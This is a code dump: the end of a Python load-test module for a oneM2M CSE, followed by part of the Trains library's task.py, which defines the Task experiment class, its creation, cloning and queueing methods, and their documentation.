print(f'{self.count} ... ', end='', flush=True)
TestLoad.startTimer()
# create an AE
TestLoad.aes.extend(self._createAEs(1))
ae = TestLoad.aes[0]
        # add self.count containers
cnts = self._createCNTs(ae[1], ae[0], self.count, 10)
self.assertEqual(len(cnts), self.count)
# add 20 CIN to each container
for cnt in cnts:
self._createCINs(ae[1], cnt[1], ae[0], 20)
print(f'{TestLoad.stopTimer(self.count)} ... ', end='', flush=True)
@unittest.skipIf(noCSE, 'No CSEBase')
def test_deleteCNTCINs(self) -> None:
""" Delete 1 AE + n CNTs + 20 CINs. This might take a moment. """
self.assertEqual(len(TestLoad.aes), 1)
print(f'{self.count} ... ', end='', flush=True)
TestLoad.startTimer()
self._deleteAEs(1)
print(f'{TestLoad.stopTimer(1)} ... ', end='', flush=True)
# TODO: RETRIEVE CNT+CIN+la n times
# TODO: retrieve AEs
# TODO Discover AEs
# TODO discover CIN
# TODO CNT + CIN
# TODO CNT + CIN + SUB
def run(testVerbosity:int, testFailFast:bool) -> Tuple[int, int, int]:
suite = unittest.TestSuite()
suite.addTest(TestLoad('test_createAEs', 10))
suite.addTest(TestLoad('test_deleteAEs', 10))
suite.addTest(TestLoad('test_createAEs', 100))
suite.addTest(TestLoad('test_deleteAEs', 100))
suite.addTest(TestLoad('test_createAEsParallel', 10, 10))
suite.addTest(TestLoad('test_deleteAEsParallel', 10, 10))
suite.addTest(TestLoad('test_createAEs', 1000))
suite.addTest(TestLoad('test_deleteAEs', 1000))
suite.addTest(TestLoad('test_createAEsParallel', 100, 10))
suite.addTest(TestLoad('test_deleteAEsParallel', 100, 10))
suite.addTest(TestLoad('test_createAEsParallel', 10, 100))
suite.addTest(TestLoad('test_deleteAEsParallel', 10, 100))
suite.addTest(TestLoad('test_createCNTCINs', 10))
suite.addTest(TestLoad('test_deleteCNTCINs', 10))
suite.addTest(TestLoad('test_createCNTCINs', 100))
suite.addTest(TestLoad('test_deleteCNTCINs', 100))
result = unittest.TextTestRunner(verbosity=testVerbosity, failfast=testFailFast).run(suite)
printResult(result)
return result.testsRun, len(result.errors + result.failures), len(result.skipped)
if __name__ == '__main__':
_, errors, _ = run(2, True)
sys.exit(errors)
|
task.py
|
import atexit
import os
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from tempfile import mkstemp
try:
# noinspection PyCompatibility
from collections.abc import Callable, Sequence as CollectionsSequence
except ImportError:
from collections import Callable, Sequence as CollectionsSequence
from typing import Optional, Union, Mapping, Sequence, Any, Dict, Iterable, TYPE_CHECKING
import psutil
import six
from pathlib2 import Path
from .backend_api.services import tasks, projects, queues
from .backend_api.session.session import Session, ENV_ACCESS_KEY, ENV_SECRET_KEY
from .backend_interface.metrics import Metrics
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.util import get_single_result, exact_match_regex, make_message, mutually_exclusive
from .binding.absl_bind import PatchAbsl
from .binding.artifacts import Artifacts, Artifact
from .binding.environ_bind import EnvironmentBind, PatchOsFork
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import TensorflowBinding
from .binding.frameworks.xgboost_bind import PatchXGBoostModelIO
from .binding.joblib_bind import PatchedJoblib
from .binding.matplotlib_bind import PatchedMatplotlib
from .config import config, DEV_TASK_NO_REUSE, get_is_master_node
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import Model, InputModel, OutputModel, ARCHIVED_TAG
from .task_parameters import TaskParameters
from .utilities.args import argparser_parseargs_called, get_argparser_last_args, \
argparser_update_currenttask
from .utilities.dicts import ReadOnlyDict
from .utilities.proxy_object import ProxyDictPreWrite, ProxyDictPostWrite, flatten_dictionary, \
nested_from_flat_dictionary, naive_nested_from_flat_dictionary
from .utilities.resource_monitor import ResourceMonitor
from .utilities.seed import make_deterministic
# noinspection PyProtectedMember
from .backend_interface.task.args import _Arguments
if TYPE_CHECKING:
import pandas
import numpy
from PIL import Image
class Task(_Task):
"""
The ``Task`` class is a code template for a Task object which, together with its connected experiment components,
represents the current running experiment. These connected components include hyperparameters, loggers,
configuration, label enumeration, models, and other artifacts.
    The term "main execution Task" refers to the Task context for the current running experiment. Python experiment scripts
    can create one, and only one, main execution Task. It is traceable, and after a script runs and Trains stores
the Task in the **Trains Server** (backend), it is modifiable, reproducible, executable by a worker, and you
can duplicate it for further experimentation.
The ``Task`` class and its methods allow you to create and manage experiments, as well as perform
advanced experimentation functions, such as autoML.
.. warning::
Do not construct Task objects directly. Use one of the methods listed below to create experiments or
reference existing experiments.
For detailed information about creating Task objects, see the following methods:
- :meth:`Task.init` - Create a new reproducible Task, or reuse one.
- :meth:`Task.create` - Create a new non-reproducible Task.
- :meth:`Task.current_task` - Get the current running Task.
- :meth:`Task.get_task` - Get another Task (whose metadata the **Trains Server** maintains).
.. note::
The **Trains** documentation often refers to a Task as, "Task (experiment)".
"Task" refers to the class in the Trains Python Client Package, the object in your Python experiment script,
and the entity with which **Trains Server** and **Trains Agent** work.
"Experiment" refers to your deep learning solution, including its connected components, inputs, and outputs,
and is the experiment you can view, analyze, compare, modify, duplicate, and manage using the Trains
**Web-App** (UI).
Therefore, a "Task" is effectively an "experiment", and "Task (experiment)" encompasses its usage throughout
    Trains.
The exception to this Task behavior is sub-tasks (non-reproducible Tasks), which do not use the main execution
Task. Creating a sub-task always creates a new Task with a new Task ID.
"""
TaskTypes = _Task.TaskTypes
NotSet = object()
__create_protection = object()
__main_task = None # type: Optional[Task]
__exit_hook = None
__forked_proc_main_pid = None
__task_id_reuse_time_window_in_hours = float(config.get('development.task_reuse_time_window_in_hours', 24.0))
__detect_repo_async = config.get('development.vcs_repo_detect_async', False)
__default_output_uri = config.get('development.default_output_uri', None)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
def __init__(self, private=None, **kwargs):
"""
.. warning::
**Do not construct Task manually!**
Please use :meth:`Task.init` or :meth:`Task.get_task`
"""
if private is not Task.__create_protection:
raise UsageError(
'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
self._repo_detect_lock = threading.RLock()
super(Task, self).__init__(**kwargs)
self._arguments = _Arguments(self)
self._logger = None
self._last_input_model_id = None
self._connected_output_model = None
self._dev_worker = None
self._connected_parameter_type = None
self._detect_repo_async_thread = None
self._resource_monitor = None
self._artifacts_manager = Artifacts(self)
self._calling_filename = None
# register atexit, so that we mark the task as stopped
self._at_exit_called = False
@classmethod
def current_task(cls):
# type: () -> Task
"""
Get the current running Task (experiment). This is the main execution Task (task context) returned as a Task
object.
:return: The current running Task (experiment).
"""
return cls.__main_task
@classmethod
def init(
cls,
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=TaskTypes.training, # type: Task.TaskTypes
reuse_last_task_id=True, # type: bool
output_uri=None, # type: Optional[str]
auto_connect_arg_parser=True, # type: Union[bool, Mapping[str, bool]]
auto_connect_frameworks=True, # type: Union[bool, Mapping[str, bool]]
auto_resource_monitoring=True, # type: bool
):
# type: (...) -> Task
"""
Creates a new Task (experiment), or returns the existing Task, depending upon the following:
- If **any** of the following are true, Trains creates a new Task and a new Task ID:
- a Task in the same project with same name does not exist, **or**
- a Task in the same project with same name does exist and its status is ``Published``, **or**
- the ``reuse_last_task_id`` parameter is assigned ``False``.
- If **all** of the following are true, Trains returns the existing Task with the existing Task ID:
- a Task in the same project with the same name does exist, **and**
- the Task's status is ``Draft``, ``Completed``, ``Failed``, or ``Aborted``, **and**
- the ``reuse_last_task_id`` parameter is the default value of ``True``.
.. warning::
When a Python experiment script runs using an existing Task, it overwrites previous experiment output.
:param str project_name: The name of the project in which the experiment will be created. If the project does
not exist, it is created. If ``project_name`` is ``None``, the repository name is used. (Optional)
:param str task_name: The name of Task (experiment). If ``task_name`` is ``None``, the Python experiment
script's file name is used. (Optional)
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:param bool reuse_last_task_id: Force a new Task (experiment) with a new Task ID, but
the same project and Task names.
.. note::
Trains creates the new Task ID using the previous Id, which is stored in the data cache folder.
The values are:
- ``True`` - Reuse the last Task ID. (default)
- ``False`` - Force a new Task (experiment).
- A string - In addition to a boolean, you can use a string to set a specific value for Task ID
(instead of the system generated UUID).
:param str output_uri: The default location for output models and other artifacts. In the default location,
Trains creates a subfolder for the output. The subfolder structure is the following:
<output destination name> / <project name> / <task name>.< Task ID>
The following are examples of ``output_uri`` values for the supported locations:
- A shared folder: ``/mnt/share/folder``
- S3: ``s3://bucket/folder``
- Google Cloud Storage: ``gs://bucket-name/folder``
- Azure Storage: ``azure://company.blob.core.windows.net/folder/``
.. important::
For cloud storage, you must install the **Trains** package for your cloud storage type,
and then configure your storage credentials. For detailed information, see
`Trains Python Client Extras <./references/trains_extras_storage/>`_ in the "Trains Python Client
Reference" section.
:param auto_connect_arg_parser: Automatically connect an argparse object to the Task?
The values are:
- ``True`` - Automatically connect. (default)
- ``False`` - Do not automatically connect.
            - A dictionary - In addition to a boolean, you can use a dictionary for fine-grained control of connected
arguments. The dictionary keys are argparse variable names and the values are booleans.
The ``False`` value excludes the specified argument from the Task's parameter section.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_arg_parser={'do_not_include_me': False, }
.. note::
To manually connect an argparse, use :meth:`Task.connect`.
:param auto_connect_frameworks: Automatically connect frameworks? This includes patching MatplotLib, XGBoost,
scikit-learn, Keras callbacks, and TensorBoard/X to serialize plots, graphs, and the model location to
the **Trains Server** (backend), in addition to original output destination.
The values are:
- ``True`` - Automatically connect (default)
- ``False`` - Do not automatically connect
            - A dictionary - In addition to a boolean, you can use a dictionary for fine-grained control of connected
frameworks. The dictionary keys are frameworks and the values are booleans.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_frameworks={'matplotlib': True, 'tensorflow': True, 'pytorch': True,
'xgboost': True, 'scikit': True}
:param bool auto_resource_monitoring: Automatically create machine resource monitoring plots?
            These plots appear in the **Trains Web-App (UI)**, **RESULTS** tab, **SCALARS** sub-tab,
with a title of **:resource monitor:**.
The values are:
- ``True`` - Automatically create resource monitoring plots. (default)
- ``False`` - Do not automatically create.
:return: The main execution Task (Task context).
"""
def verify_defaults_match():
validate = [
('project name', project_name, cls.__main_task.get_project_name()),
('task name', task_name, cls.__main_task.name),
('task type', str(task_type), str(cls.__main_task.task_type)),
]
for field, default, current in validate:
if default is not None and default != current:
raise UsageError(
"Current task already created "
"and requested {field} '{default}' does not match current {field} '{current}'. "
"If you wish to create additional tasks use `Task.create`".format(
field=field,
default=default,
current=current,
)
)
if cls.__main_task is not None:
# if this is a subprocess, regardless of what the init was called for,
# we have to fix the main task hooks and stdout bindings
if cls.__forked_proc_main_pid != os.getpid() and cls.__is_subprocess():
if task_type is None:
task_type = cls.__main_task.task_type
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure we do not wait for the repo detect thread
cls.__main_task._detect_repo_async_thread = None
cls.__main_task._dev_worker = None
cls.__main_task._resource_monitor = None
# remove the logger from the previous process
logger = cls.__main_task.get_logger()
logger.set_flush_period(None)
# create a new logger (to catch stdout/err)
cls.__main_task._logger = None
cls.__main_task._reporter = None
cls.__main_task.get_logger()
cls.__main_task._artifacts_manager = Artifacts(cls.__main_task)
# unregister signal hooks, they cause subprocess to hang
# noinspection PyProtectedMember
cls.__main_task.__register_at_exit(cls.__main_task._at_exit)
# TODO: Check if the signal handler method is safe enough, for the time being, do not unhook
# cls.__main_task.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
if not running_remotely():
verify_defaults_match()
return cls.__main_task
is_sub_process_task_id = None
# check that we are not a child process, in that case do nothing.
# we should not get here unless this is Windows platform, all others support fork
if cls.__is_subprocess():
class _TaskStub(object):
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, attr):
return self
def __setattr__(self, attr, val):
pass
is_sub_process_task_id = cls.__get_master_id_task_id()
# we could not find a task ID, revert to old stub behaviour
if not is_sub_process_task_id:
return _TaskStub()
elif running_remotely() and not get_is_master_node():
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure everyone understands we should act as if we are a subprocess (fake pid 1)
cls.__update_master_pid_task(pid=1, task=get_remote_task_id())
else:
# set us as master process (without task ID)
cls.__update_master_pid_task()
is_sub_process_task_id = None
if task_type is None:
# Backwards compatibility: if called from Task.current_task and task_type
# was not specified, keep legacy default value of TaskTypes.training
task_type = cls.TaskTypes.training
elif isinstance(task_type, six.string_types):
if task_type not in Task.TaskTypes.__members__:
raise ValueError("Task type '{}' not supported, options are: {}".format(
task_type, Task.TaskTypes.__members__.keys()))
task_type = Task.TaskTypes.__members__[str(task_type)]
try:
if not running_remotely():
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls._create_dev_task(
project_name,
task_name,
task_type,
reuse_last_task_id,
detect_repo=False if (isinstance(auto_connect_frameworks, dict) and
not auto_connect_frameworks.get('detect_repository', True)) else True
)
# set defaults
if output_uri:
task.output_uri = output_uri
elif cls.__default_output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
else:
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls(
private=cls.__create_protection,
task_id=get_remote_task_id(),
log_to_backend=False,
)
if cls.__default_output_uri and not task.output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
# make sure we are started
task.started(ignore_errors=True)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
except Exception:
raise
else:
Task.__main_task = task
# register the main task for at exit hooks (there should only be one)
task.__register_at_exit(task._at_exit)
# patch OS forking
PatchOsFork.patch_fork()
if auto_connect_frameworks:
is_auto_connect_frameworks_bool = not isinstance(auto_connect_frameworks, dict)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('scikit', True):
PatchedJoblib.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('matplotlib', True):
PatchedMatplotlib.update_current_task(Task.__main_task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tensorflow', True):
PatchAbsl.update_current_task(Task.__main_task)
TensorflowBinding.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('pytorch', True):
PatchPyTorchModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('xgboost', True):
PatchXGBoostModelIO.update_current_task(task)
if auto_resource_monitoring and not is_sub_process_task_id:
task._resource_monitor = ResourceMonitor(
task, report_mem_used_per_process=not config.get(
'development.worker.report_global_mem_used', False))
task._resource_monitor.start()
# make sure all random generators are initialized with new seed
make_deterministic(task.get_random_seed())
if auto_connect_arg_parser:
EnvironmentBind.update_current_task(Task.__main_task)
# Patch ArgParser to be aware of the current task
argparser_update_currenttask(Task.__main_task)
# set excluded arguments
if isinstance(auto_connect_arg_parser, dict):
task._arguments.exclude_parser_args(auto_connect_arg_parser)
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
parser, parsed_args = get_argparser_last_args()
task._connect_argparse(parser=parser, parsed_args=parsed_args)
elif argparser_parseargs_called():
# actually we have nothing to do, in remote running, the argparser will ignore
# all non argparser parameters, only caveat if parameter connected with the same name
# as the argparser this will be solved once sections are introduced to parameters
pass
# Make sure we start the logger, it will patch the main logging object and pipe all output
# if we are running locally and using development mode worker, we will pipe all stdout to logger.
# The logger will automatically take care of all patching (we just need to make sure to initialize it)
logger = task.get_logger()
# show the debug metrics page in the log, it is very convenient
if not is_sub_process_task_id:
logger.report_text(
'TRAINS results page: {}'.format(task.get_output_log_web_page()),
)
# Make sure we start the dev worker if required, otherwise it will only be started when we write
# something to the log.
task._dev_mode_task_start()
return task
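    # --- Illustrative usage, not part of the original module ---
    # A typical call as described in the docstring above; the project and task
    # names are hypothetical:
    #
    #   from trains import Task
    #   task = Task.init(project_name='examples', task_name='my experiment')
    #   logger = task.get_logger()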
@classmethod
def create(cls, project_name=None, task_name=None, task_type=TaskTypes.training):
# type: (Optional[str], Optional[str], TaskTypes) -> Task
"""
Create a new, non-reproducible Task (experiment). This is called a sub-task.
.. note::
- This method always creates a new Task.
- To create reproducible Tasks, use the :meth:`Task.init` method.
:param str project_name: The name of the project in which the experiment will be created.
If ``project_name`` is ``None``, and the main execution Task is initialized (see :meth:`Task.init`),
then the main execution Task's project is used. Otherwise, if the project does
not exist, it is created. (Optional)
:param str task_name: The name of Task (experiment).
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:return: A new experiment.
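For example, a minimal usage sketch (the project and task names below are placeholders):
.. code-block:: py
from trains import Task
# create a standalone, non-reproducible sub-task under an assumed "examples" project
sub_task = Task.create(project_name='examples', task_name='my sub task')
print(sub_task.id)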
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
@classmethod
def get_task(cls, task_id=None, project_name=None, task_name=None):
# type: (Optional[str], Optional[str], Optional[str]) -> Task
"""
Get a Task by Id, or project name / task name combination.
:param str task_id: The Id (system UUID) of the experiment to get.
If specified, ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Task to get.
:param str task_name: The name of the Task within ``project_name`` to get.
:return: The Task specified by ID, or project name / experiment name combination.
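For example, a minimal usage sketch (the project and task names below are placeholders and assume
the experiment already exists on the server):
.. code-block:: py
from trains import Task
# fetch an existing experiment by project / name
task = Task.get_task(project_name='examples', task_name='my experiment')
print(task.id, task.status)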
"""
return cls.__get_task(task_id=task_id, project_name=project_name, task_name=task_name)
@classmethod
def get_tasks(cls, task_ids=None, project_name=None, task_name=None, task_filter=None):
# type: (Optional[Sequence[str]], Optional[str], Optional[str], Optional[Dict]) -> Sequence[Task]
"""
Get a list of Tasks by one of the following:
- A list of specific Task IDs.
- All Tasks in a project matching a full or partial Task name.
- All Tasks in any project matching a full or partial Task name.
:param list(str) task_ids: The Ids (system UUID) of experiments to get.
If ``task_ids`` is specified, then ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Tasks to get. To get Tasks from all projects,
use the default value of ``None``. (Optional)
:param str task_name: The full name or partial name of the Tasks to match within the specified
``project_name`` (or all projects if ``project_name`` is ``None``).
This method supports regular expressions for name matching. If ``None`` is passed,
all Tasks within the project are returned. (Optional)
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
:return: The Tasks specified by the parameter combinations (see the parameters).
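For example, a minimal usage sketch (the project name and name pattern below are placeholders):
.. code-block:: py
from trains import Task
# list all experiments in a project whose name starts with "train"
matching_tasks = Task.get_tasks(project_name='examples', task_name='^train')
for t in matching_tasks:
    print(t.id, t.name)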
"""
return cls.__get_tasks(task_ids=task_ids, project_name=project_name,
task_name=task_name, **(task_filter or {}))
@property
def output_uri(self):
# type: () -> str
return self.storage_uri
@output_uri.setter
def output_uri(self, value):
# type: (str) -> None
# check if we have the correct packages / configuration
if value and value != self.storage_uri:
from .storage.helper import StorageHelper
helper = StorageHelper.get(value)
if not helper:
raise ValueError("Could not get access credentials for '{}' "
", check configuration file ~/trains.conf".format(value))
helper.check_write_permissions(value)
self.storage_uri = value
@property
def artifacts(self):
# type: () -> Dict[str, Artifact]
"""
A read-only dictionary of Task artifacts (name, artifact).
:return: The artifacts.
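For example, a minimal sketch that lists the artifacts of the current task (assumes ``task`` is the
object returned by :meth:`Task.init`):
.. code-block:: py
for name, artifact in task.artifacts.items():
    print(name, artifact)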
"""
if not Session.check_min_api_version('2.3'):
return ReadOnlyDict()
artifacts_pairs = []
if self.data.execution and self.data.execution.artifacts:
artifacts_pairs = [(a.key, Artifact(a)) for a in self.data.execution.artifacts]
if self._artifacts_manager:
artifacts_pairs += list(self._artifacts_manager.registered_artifacts.items())
return ReadOnlyDict(artifacts_pairs)
@property
def models(self):
# type: () -> Dict[str, Sequence[Model]]
"""
Read-only dictionary of the Task's loaded/stored models
:return: A dictionary of models loaded/stored {'input': list(Model), 'output': list(Model)}.
"""
return self.get_models()
@classmethod
def clone(
cls,
source_task=None, # type: Optional[Union[Task, str]]
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
):
# type: (...) -> Task
"""
Create a duplicate (a clone) of a Task (experiment). The status of the cloned Task is ``Draft``
and modifiable.
Use this method to manage experiments and for autoML.
:param str source_task: The Task to clone. Specify a Task object or a Task ID. (Optional)
:param str name: The name of the new cloned Task. (Optional)
:param str comment: A comment / description for the new cloned Task. (Optional)
:param str parent: The Id of the parent Task of the new Task.
- If ``parent`` is not specified, then ``parent`` is set to ``source_task.parent``.
- If ``parent`` is not specified and ``source_task.parent`` is not available, then
``parent`` is set to ``source_task``.
:param str project: The Id of the project in which to create the new Task.
If ``None``, the new task inherits the original Task's project. (Optional)
:return: The new cloned Task (experiment).
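For example, a minimal usage sketch (the source task ID and names below are placeholders):
.. code-block:: py
from trains import Task
# 'aabbcc112233' is a placeholder task ID of an existing experiment
cloned_task = Task.clone(source_task='aabbcc112233', name='cloned experiment')
print(cloned_task.id)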
"""
assert isinstance(source_task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
task_id = source_task if isinstance(source_task, six.string_types) else source_task.id
if not parent:
if isinstance(source_task, six.string_types):
source_task = cls.get_task(task_id=source_task)
parent = source_task.id if not source_task.parent else source_task.parent
elif isinstance(parent, Task):
parent = parent.id
cloned_task_id = cls._clone_task(cloned_task_id=task_id, name=name, comment=comment,
parent=parent, project=project)
cloned_task = cls.get_task(task_id=cloned_task_id)
return cloned_task
@classmethod
def enqueue(cls, task, queue_name=None, queue_id=None):
# type: (Union[Task, str], Optional[str], Optional[str]) -> Any
"""
Enqueue a Task for execution, by adding it to an execution queue.
.. note::
A worker daemon must be listening at the queue for the worker to fetch the Task and execute it.
See `Use Case Examples <../trains_agent_ref/#use-case-examples>`_ on the "Trains Agent
Reference" page.
:param Task/str task: The Task to enqueue. Specify a Task object or Task ID.
:param str queue_name: The name of the queue. If not specified, then ``queue_id`` must be specified.
:param str queue_id: The Id of the queue. If not specified, then ``queue_name`` must be specified.
:return: An enqueue JSON response.
.. code-block:: javascript
{
"queued": 1,
"updated": 1,
"fields": {
"status": "queued",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T15:05:35.426770+00:00",
"last_update": "2020-02-24T15:05:35.426770+00:00",
"execution.queue": "2bd96ab2d9e54b578cc2fb195e52c7cf"
}
}
- ``queued`` - The number of Tasks enqueued (an integer or ``null``).
- ``updated`` - The number of Tasks updated (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time (ISO 8601 format).
- ``last_update`` - The last Task update time, including Task creation, update, change, or events for
this task (ISO 8601 format).
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
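For example, a minimal usage sketch (the project, task and queue names below are placeholders and
assume a matching experiment and queue already exist on the server):
.. code-block:: py
from trains import Task
# fetch an existing experiment and add it to the "default" execution queue
task = Task.get_task(project_name='examples', task_name='my experiment')
response = Task.enqueue(task, queue_name='default')
print(response)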
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
# make sure we have either name or id
mutually_exclusive(queue_name=queue_name, queue_id=queue_id)
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
if not queue_id:
req = queues.GetAllRequest(name=exact_match_regex(queue_name), only_fields=["id"])
res = cls._send(session=session, req=req)
if not res.response.queues:
raise ValueError('Could not find queue named "{}"'.format(queue_name))
queue_id = res.response.queues[0].id
if len(res.response.queues) > 1:
LoggerRoot.get_base_logger().info("Multiple queues with name={}, selecting queue id={}".format(
queue_name, queue_id))
req = tasks.EnqueueRequest(task=task_id, queue=queue_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
@classmethod
def dequeue(cls, task):
# type: (Union[Task, str]) -> Any
"""
Dequeue (remove) a Task from an execution queue.
:param Task/str task: The Task to dequeue. Specify a Task object or Task ID.
:return: A dequeue JSON response.
.. code-block:: javascript
{
"dequeued": 1,
"updated": 1,
"fields": {
"status": "created",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T16:43:43.057320+00:00",
"last_update": "2020-02-24T16:43:43.057320+00:00",
"execution.queue": null
}
}
- ``dequeued`` - The number of Tasks dequeued (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time in ISO 8601 format.
- ``last_update`` - The last time the Task was created, updated,
changed or events for this task were reported.
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
- ``updated`` - The number of Tasks updated (an integer or ``null``).
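For example, a minimal usage sketch (the project and task names below are placeholders and assume
the experiment is currently enqueued):
.. code-block:: py
from trains import Task
# remove a previously enqueued experiment from its execution queue
task = Task.get_task(project_name='examples', task_name='my experiment')
response = Task.dequeue(task)
print(response)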
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
req = tasks.DequeueRequest(task=task_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
def add_tags(self, tags):
# type: (Union[Sequence[str], str]) -> None
"""
Add Tags to this task. Old tags are not deleted. When executing a Task (experiment) remotely,
this method has no effect.
:param tags: A list of tags which describe the Task to add.
"""
if not running_remotely() or not self.is_main_task():
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags.extend(tags)
self._edit(tags=list(set(self.data.tags)))
def connect(self, mutable):
# type: (Any) -> Any
"""
Connect an object to a Task object. This connects an experiment component (part of an experiment) to the
experiment. For example, connect hyperparameters or models.
:param object mutable: The experiment component to connect. The object can be any object Task supports
integrating, including:
- argparse - An argparse object for parameters.
- dict - A dictionary for parameters.
- TaskParameters - A TaskParameters object.
- model - A model object for initial model warmup, or for model update/snapshot uploading.
:return: The result returned when connecting the object, if supported.
:raise: Raise an exception on unsupported objects.
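For example, a minimal sketch connecting a parameter dictionary (assumes ``task`` is the object
returned by :meth:`Task.init`; the parameter names are placeholders):
.. code-block:: py
params = {'batch_size': 32, 'learning_rate': 0.001}
# after connecting, the dictionary is logged and, in remote execution, overridden by the backend
params = task.connect(params)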
"""
dispatch = (
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
)
for mutable_type, method in dispatch:
if isinstance(mutable, mutable_type):
return method(mutable)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
def connect_configuration(self, configuration):
# type: (Union[Mapping, Path, str]) -> Union[Mapping, Path, str]
"""
Connect a configuration dictionary or configuration file (pathlib.Path / str) to a Task object.
This method should be called before reading the configuration file.
Later, when creating an output model, the model will include the contents of the configuration dictionary
or file.
For example, a local file:
.. code-block:: py
config_file = task.connect_configuration(config_file)
my_params = json.load(open(config_file,'rt'))
A parameter dictionary:
.. code-block:: py
my_params = task.connect_configuration(my_params)
:param configuration: The configuration. This is usually the configuration used in the model training process.
Specify one of the following:
- A dictionary - A dictionary containing the configuration. Trains stores the configuration in
the **Trains Server** (backend), in a HOCON format (JSON-like format) which is editable.
- A ``pathlib2.Path`` string - A path to the configuration file. Trains stores the content of the file.
A local path must be a relative path. When executing a Task remotely in a worker, the contents brought
from the **Trains Server** (backend) overwrites the contents of the file.
:return: If a dictionary is specified, then a dictionary is returned. If a ``pathlib2.Path`` / string is
specified, then a path to a local configuration file is returned.
"""
if not isinstance(configuration, (dict, Path, six.string_types)):
raise ValueError("connect_configuration supports `dict`, `str` and 'Path' types, "
"{} is not supported".format(type(configuration)))
# parameter dictionary
if isinstance(configuration, dict):
def _update_config_dict(task, config_dict):
# noinspection PyProtectedMember
task._set_model_config(config_dict=config_dict)
if not running_remotely() or not self.is_main_task():
self._set_model_config(config_dict=configuration)
configuration = ProxyDictPostWrite(self, _update_config_dict, **configuration)
else:
configuration.clear()
configuration.update(self._get_model_config_dict())
configuration = ProxyDictPreWrite(False, False, **configuration)
return configuration
# it is a path to a local file
if not running_remotely() or not self.is_main_task():
# check if not absolute path
configuration_path = Path(configuration)
if not configuration_path.is_file():
